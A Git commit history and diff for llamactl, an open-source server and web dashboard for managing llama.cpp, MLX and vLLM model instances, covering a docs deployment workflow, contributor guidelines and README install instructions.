212 Commits

Author SHA1 Message Date
12bbf34236 Merge pull request #46 from lordmathis/feat/env-vars
feat: Add support for passing env vars to instances
2025-09-28 15:42:02 +02:00
9a7255a52d Refactor Docker support section in README for clarity and conciseness 2025-09-28 15:31:50 +02:00
97a7c9a4e3 Detail env var support in docs 2025-09-28 15:29:43 +02:00
fa9335663a Parse backend env vars from env vars 2025-09-28 15:22:01 +02:00
d092518114 Update documentation 2025-09-28 15:10:35 +02:00
ffa0a0c161 Remove ZodFormField and BasicInstanceFields components 2025-09-28 14:42:10 +02:00
1fbf809a2d Add EnvironmentVariablesInput component and integrate into InstanceSettingsCard 2025-09-28 14:42:10 +02:00
c984d95723 Add environment variable support to instance options and command building 2025-09-28 14:42:10 +02:00
50e1355205 Add environment field to BackendSettings for improved configuration 2025-09-28 14:42:10 +02:00
7994fd05b3 Merge pull request #44 from BobbyL2k/fix/rel-dir-config
fix: InstancesDir and LogsDir not being relative path to DataDir when not set
2025-09-27 21:33:00 +02:00
Anuruth Lertpiya
f496a28f04 fix: InstancesDir and LogsDir not being relative path to DataDir when not set 2025-09-27 18:14:25 +00:00
f9371e876d Merge pull request #43 from BobbyL2k/fix/config-path
fix: llamactl reads config file per documentation
2025-09-27 19:32:13 +02:00
Anuruth Lertpiya
3a979da815 fix: llamactl reads config file per documentation
- Added logging to track config file reading operations
- llamactl now properly reads config files from the expected locations ("llamactl.yaml" and "config.yaml" under current directory)
2025-09-27 17:03:54 +00:00
a824f066ec Merge pull request #42 from lordmathis/feat/docker-backends
feat: Add support for dockerized backends
2025-09-25 23:07:24 +02:00
2cd9d374a7 Add Docker badge to UI 2025-09-25 23:04:24 +02:00
031d6c7017 Update Docker command arguments for llama-server and vllm with volume mounts 2025-09-25 22:51:51 +02:00
282344af23 Fix docker command args building 2025-09-25 22:51:40 +02:00
bc9e0535c3 Refactor command building and argument handling 2025-09-25 22:05:46 +02:00
2d925b473d Add Docker support documentation and configuration for backends 2025-09-24 22:15:21 +02:00
ba0f877185 Fix tests 2025-09-24 21:35:44 +02:00
840a7bc650 Add Docker command handling for backend options and refactor command building 2025-09-24 21:34:54 +02:00
76ac93bedc Implement Docker command handling for Llama, MLX, and vLLM backends 2025-09-24 21:31:58 +02:00
72d2a601c8 Update Docker args in LoadConfig and tests to include 'run --rm' prefix 2025-09-24 21:27:51 +02:00
9a56660f68 Refactor backend configuration to use structured settings and update environment variable handling 2025-09-24 20:31:20 +02:00
78a483ee4a Merge pull request #41 from lordmathis/fix/docs-release
fix: Refactor docs workflow to trigger on version tags
2025-09-23 22:35:05 +02:00
cdcef7c7ae Refactor docs workflow to trigger on version tags 2025-09-23 22:32:02 +02:00
6f5d886089 Merge pull request #40 from lordmathis/feat/system-info
feat: rework system info dialog
2025-09-23 22:11:42 +02:00
e3bf8ac05a Update SystemInfo dialog 2025-09-23 22:05:31 +02:00
edf0575925 Replace SystemInfoDialog with BackendInfoDialog and update related references 2025-09-23 21:44:04 +02:00
71a48aa3b6 Update server API functions to use /backends/llama-cpp path 2025-09-23 21:28:23 +02:00
30e40ecd30 Refactor API endpoints to use /backends/llama-cpp path and update related documentation 2025-09-23 21:27:58 +02:00
322e1c5eb7 Merge pull request #39 from lordmathis/feat/instance-dialog
feat: Redesign create/edit instance dialog
2025-09-23 21:14:34 +02:00
2cbd666d38 Redesign create/edit instance dialog 2025-09-23 21:11:00 +02:00
9ebc05fa3a Merge pull request #38 from lordmathis/feat/instance-card
feat: Redesign instance card
2025-09-23 19:48:20 +02:00
05e4335389 Fix instance management tests 2025-09-23 19:45:45 +02:00
850cf018e3 Refactor BackendBadge component 2025-09-23 19:20:53 +02:00
9c3da55c5d Improve InstanceCard layout 2025-09-23 18:12:58 +02:00
16d311a3d0 Merge pull request #37 from lordmathis/lordmathis-patch-1
fix: Set default docs version
2025-09-23 13:48:53 +02:00
32f58502de Update docs.yml 2025-09-23 13:46:58 +02:00
788f5a2246 Merge pull request #36 from lordmathis/lordmathis-patch-1
fix: Run docs build job on every update
2025-09-23 13:21:53 +02:00
37f464007f Update docs.yml 2025-09-23 13:19:54 +02:00
84d994c625 Merge pull request #35 from lordmathis/chore/docs-update
chore: Update docs
2025-09-22 23:24:12 +02:00
120875351f Fix image paths for MkDocs rendering in readme_sync.py 2025-09-22 23:22:27 +02:00
3a63308d5f Update error descriptions in API documentation for clarity 2025-09-22 22:39:01 +02:00
46622d2107 Update documentation and add README synchronization 2025-09-22 22:37:53 +02:00
ebc82c37aa Merge pull request #34 from lordmathis/feat/vllm-backend
feat: Implement vLLM backend
2025-09-22 21:58:19 +02:00
48b3a39dfe Move badges in instance card 2025-09-22 21:54:04 +02:00
c10153f59f Add BackendBadge component and integrate it into InstanceCard 2025-09-22 21:48:33 +02:00
588b025fb1 Handle empty responses for JSON endpoints in apiCall function 2025-09-22 21:39:44 +02:00
6dcf0f806e Fix VLLM command placeholder formatting 2025-09-22 21:30:59 +02:00
184d6df1bc Fix vllm command parsing 2025-09-22 21:25:50 +02:00
313666ea17 Fix missing vllm proxy setup 2025-09-22 20:51:00 +02:00
c3ca5b95f7 Update BuildCommandArgs to use positional argument for model and adjust tests accordingly 2025-09-22 20:32:03 +02:00
2c86fc6470 Update api referrence 2025-09-21 22:16:56 +02:00
785915943b Update api docs 2025-09-21 22:03:07 +02:00
55765d2020 Add vLLM backend support to documentation and update instance management instructions 2025-09-21 21:57:36 +02:00
6ff9aa5470 Remove vLLM backend implementation specification document 2025-09-21 21:38:10 +02:00
501afb7f0d Refactor form components and improve API error handling 2025-09-21 21:33:53 +02:00
b665194307 Add vLLM backend support to webui 2025-09-21 20:58:43 +02:00
7eb59aa7e0 Remove unused JSON unmarshal test and clean up command argument checks 2025-09-19 20:46:25 +02:00
64842e74b0 Refactor command parsing and building 2025-09-19 20:23:25 +02:00
34a949d22e Refactor command argument building and parsing 2025-09-19 19:59:46 +02:00
ec5485bd0e Refactor command argument building across backends 2025-09-19 19:46:54 +02:00
9eecb37aec Refactor MLX and VLLM server options parsing and args building 2025-09-19 19:39:36 +02:00
c7136d5206 Refactor command parsing logic across backends to utilize a unified CommandParserConfig structure 2025-09-19 18:36:23 +02:00
4df02a6519 Initial vLLM backend support 2025-09-19 18:05:12 +02:00
02fdae24ee Merge pull request #33 from lordmathis/feat/doc-versioning
feat: Docs versioning
2025-09-18 21:07:04 +02:00
9a8647775d Setup docs versioning 2025-09-18 21:04:11 +02:00
3081a1986b Merge pull request #32 from lordmathis/feat/mlx-backend
feat: Implement mlx-lm backend
2025-09-18 20:34:04 +02:00
6a580667ed Remove LlamaExecutable checks from default and file loading tests 2025-09-18 20:30:26 +02:00
2a20817078 Remove redundant LlamaExecutable field from instance configuration in tests 2025-09-18 20:29:04 +02:00
5e2d237887 Update project description for clarity and consistency in README 2025-09-18 20:21:30 +02:00
84c3453281 Refactor features section in README for improved clarity and organization 2025-09-18 20:14:03 +02:00
8006dd3841 Fix formatting in README for consistency in feature descriptions 2025-09-18 20:03:19 +02:00
8820dc1146 Enhance documentation for MLX backend support 2025-09-18 20:01:18 +02:00
11296bc5f8 Update README to include MLX backend support and enhance usage instructions 2025-09-18 19:34:40 +02:00
5121f0e302 Remove PythonPath references from MlxServerOptions and related configurations 2025-09-17 21:59:55 +02:00
587be68077 Add MLX backend support with configuration and parsing enhancements 2025-09-16 22:38:39 +02:00
cc5d8acd92 Refactor instance and manager tests to use BackendConfig for LlamaExecutable and MLXLMExecutable 2025-09-16 21:45:50 +02:00
154b754aff Add MLX command parsing and routing support 2025-09-16 21:39:08 +02:00
63fea02d66 Add MLX backend support in CreateInstanceOptions and validation 2025-09-16 21:38:33 +02:00
468688cdbc Pass backend options to instances 2025-09-16 21:37:48 +02:00
988c4aca40 Add MLX backend config options 2025-09-16 21:14:19 +02:00
1f25e9d05b Merge pull request #31 from lordmathis/feat/parse-command
feat: Implement command parsing in Create Instance
2025-09-15 22:18:39 +02:00
1b5934303b Enhance command parsing in ParseLlamaCommand and improve error handling in ParseCommandRequest 2025-09-15 22:12:56 +02:00
ccabd84568 Add margin to textarea in ParseCommandDialog for improved spacing 2025-09-15 21:36:24 +02:00
e7b06341c3 Enhance command parsing in ParseLlamaCommand 2025-09-15 21:29:46 +02:00
323056096c Implement llama-server command parsing and add UI components for command input 2025-09-15 21:04:14 +02:00
cb1669f853 Merge pull request #30 from lordmathis/dependabot/npm_and_yarn/webui/npm_and_yarn-f5c1666f0c
Bump vite from 7.0.5 to 7.1.5 in /webui in the npm_and_yarn group across 1 directory
2025-09-14 10:47:38 +02:00
dependabot[bot]
a5d1f24cbf Bump vite in /webui in the npm_and_yarn group across 1 directory
Bumps the npm_and_yarn group with 1 update in the /webui directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).


Updates `vite` from 7.0.5 to 7.1.5
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v7.1.5/packages/vite)

---
updated-dependencies:
- dependency-name: vite
  dependency-version: 7.1.5
  dependency-type: direct:development
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
2025-09-09 21:38:38 +00:00
92f0bd02f2 Merge pull request #29 from lordmathis/lordmathis-patch-1
chore: Switch main dashboard screenshot
2025-09-04 22:54:06 +02:00
0a16f617ad Add files via upload 2025-09-04 22:47:14 +02:00
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
5aed01b68f Merge pull request #17 from lordmathis/fix/forbidden-logs
fix: Refactor log fetching to use instancesApi
2025-08-06 19:12:34 +02:00
3f9caff33b Refactor log fetching to use instancesApi 2025-08-06 19:07:25 +02:00
169254c61a Merge pull request #16 from lordmathis/fix/llama-server-options
fix: Missing or wrong llama server options
2025-08-06 18:51:18 +02:00
8154b8d0ab Fix temp in tests 2025-08-06 18:49:36 +02:00
a26d853ad5 Fix missing or wrong llama server options on frontend 2025-08-06 18:40:05 +02:00
6203b64045 Fix missing or wrong llama server options 2025-08-06 18:31:17 +02:00
8d9c808be1 Merge pull request #14 from lordmathis/docs/readme-updates
docs: Update README.md to improve project description
2025-08-05 21:32:20 +02:00
161cd213c5 Update README.md to enhance project description and installation instructions 2025-08-05 21:20:37 +02:00
d6e84f0527 Merge pull request #13 from lordmathis/fix/decimal-input
fix: Allow decimal input for numeric fields in instance configuration
2025-08-05 20:03:31 +02:00
0846350d41 Fix eslint issues in ZodFormField 2025-08-05 19:21:09 +02:00
dacaca8594 Fix number input handling to allow decimal values 2025-08-05 19:15:12 +02:00
6e3f5cec61 Merge pull request #12 from lordmathis/refactor/pkg-restructure
Pkg restructure
2025-08-04 20:48:18 +02:00
85b3638efb Update ValidateInstanceName to return the validated name and modify tests accordingly 2025-08-04 20:46:15 +02:00
934d1c5aaa Refactor instance management by moving operations to a new file 2025-08-04 20:38:57 +02:00
2abe9c282e Rename config and instance struct to avoid awkward naming 2025-08-04 19:30:50 +02:00
6a7a9a2d09 Split large package into subpackages 2025-08-04 19:23:56 +02:00
a3c44dad1e Merge pull request #11 from lordmathis/feat/state-persistance
feat: Persist instances configs across app restarts
2025-08-02 23:47:35 +02:00
7426008ef9 Use instance directly in DeleteInstance 2025-08-02 23:35:03 +02:00
cf26aa521a Update README.md to enhance API Key authentication section and provide usage examples 2025-08-02 23:15:25 +02:00
d94c922314 Update README.md for data persistence features 2025-08-02 23:02:30 +02:00
3cbd23a6e2 Implement persistence tests 2025-08-02 22:52:50 +02:00
bed172bf73 Implement instance loading and auto-start functionality on manager initialization 2025-08-02 21:39:19 +02:00
d449255bc9 Persist instance state after starting and stopping instances 2025-08-02 21:23:31 +02:00
de89d0673a Implement instance persistence with JSON file storage and deletion 2025-08-02 21:09:16 +02:00
dd6ffa548c Refactor configuration structure to replace DataConfig with instance-specific directories and auto-creation options 2025-08-02 19:10:40 +02:00
7935f19cc1 Add data directory configuration with auto-creation option 2025-08-02 15:33:33 +02:00
f1718198a3 Merge pull request #10 from lordmathis/fix/graceful-shutdown
Implement graceful shutdown
2025-08-01 23:44:58 +02:00
b24d744cad Implement graceful shutdown for the server and add Shutdown method to InstanceManager 2025-08-01 23:41:18 +02:00
fff8b2dbde Merge pull request #9 from lordmathis/docs/add-prebuilt-install-instructions
Update installation instructions in README.md to include prebuilt binaries
2025-08-01 20:23:54 +02:00
b94909dee4 Update installation instructions in README.md to include prebuilt binaries and manual download steps 2025-08-01 20:17:29 +02:00
106 changed files with 10993 additions and 4785 deletions

103
.github/workflows/docs.yml vendored Normal file
View File

@@ -0,0 +1,103 @@
name: Build and Deploy Documentation
on:
push:
branches: [ main ]
tags: [ 'v*' ]
pull_request:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
permissions:
contents: write
pages: write
id-token: write
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Build documentation
run: |
mkdocs build --strict
deploy-dev:
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main' && github.event_name == 'push'
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Configure Git
run: |
git config --global user.name "${{ github.actor }}"
git config --global user.email "${{ github.actor }}@users.noreply.github.com"
- name: Deploy development version
run: |
mike deploy --push --update-aliases dev latest
# Set dev as default if no default exists
if ! mike list | grep -q "default"; then
mike set-default --push dev
fi
deploy-release:
runs-on: ubuntu-latest
if: startsWith(github.ref, 'refs/tags/v')
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Configure Git
run: |
git config --global user.name "${{ github.actor }}"
git config --global user.email "${{ github.actor }}@users.noreply.github.com"
- name: Deploy release version
run: |
VERSION=${GITHUB_REF#refs/tags/}
mike deploy --push --update-aliases $VERSION stable
mike set-default --push stable

View File

@@ -29,6 +29,8 @@ jobs:
npm ci
- name: Build Web UI
env:
VITE_APP_VERSION: ${{ github.ref_name }}
run: |
cd webui
npm run build

4
.gitignore vendored
View File

@@ -32,4 +32,6 @@ go.work.sum
# .vscode/
node_modules/
dist/
dist/
__pycache__/

19
.vscode/launch.json vendored Normal file
View File

@@ -0,0 +1,19 @@
{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Launch Server",
"type": "go",
"request": "launch",
"mode": "auto",
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
},
}
]
}

1
CNAME Normal file
View File

@@ -0,0 +1 @@
llamactl.org

182
CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,182 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!

388
README.md
View File

@@ -2,265 +2,231 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
A control server for managing multiple Llama Server instances with a web-based dashboard.
**Unified management and routing for llama.cpp, MLX and vLLM models with web dashboard.**
## Features
- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
- **Web Dashboard**: Modern React-based UI for managing instances
- **Auto-restart**: Configurable automatic restart on instance failure
- **Instance Monitoring**: Real-time health checks and status monitoring
- **Log Management**: View, search, and download instance logs
- **REST API**: Full API for programmatic control
- **OpenAI Compatible**: Route requests to instances by instance name
- **Configuration Management**: Comprehensive llama-server parameter support
- **System Information**: View llama-server version, devices, and help
### 🚀 Easy Model Management
- **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
- **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
- **State Persistence**: Ensure instances remain intact across server restarts
## Prerequisites
### 🔗 Universal Compatibility
- **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Support**: Run backends in containers
This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
### 🌐 User-Friendly Interface
- **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
- **API Key Authentication**: Separate keys for management vs inference access
**Install llama.cpp:**
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
### ⚡ Smart Operations
- **Instance Monitoring**: Health checks, auto-restart, log management
- **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
- **Environment Variables**: Set custom environment variables per instance for advanced configuration
## Installation
![Dashboard Screenshot](docs/images/dashboard.png)
### Build Requirements
- Go 1.24 or later
- Node.js 22 or later (for building the web UI)
### Building with Web UI
## Quick Start
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# 1. Install backend (one-time setup)
# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
# For MLX on macOS: pip install mlx-lm
# For vLLM: pip install vllm
# Or use Docker - no local installation required
# Install Node.js dependencies
cd webui
npm ci
# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Build the web UI
npm run build
# Return to project root and build
cd ..
go build -o llamactl ./cmd/server
# Run the server
./llamactl
```
## Configuration
